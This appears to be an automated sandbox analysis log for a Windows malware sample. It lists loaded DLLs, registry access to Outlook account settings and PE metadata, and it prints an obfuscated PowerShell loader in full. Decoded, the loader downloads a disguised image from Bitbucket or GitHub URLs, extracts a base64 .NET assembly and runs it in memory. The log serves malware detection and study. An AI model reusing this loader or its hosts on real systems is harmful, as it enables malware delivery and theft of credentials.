                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: policymanager.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: 6706e721f2c06.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 6706e721f2c06.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: 6706e721f2c06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wextract.pdb source: 6706e721f2c06.exe, MicrosoftServiceUpdater.exe.9.dr, payload[1].exe.9.dr
                      Source: Binary string: wextract.pdbGCTL source: 6706e721f2c06.exe, MicrosoftServiceUpdater.exe.9.dr, payload[1].exe.9.dr
                      Source: 6706e721f2c06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 6706e721f2c06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 6706e721f2c06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 6706e721f2c06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 6706e721f2c06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' 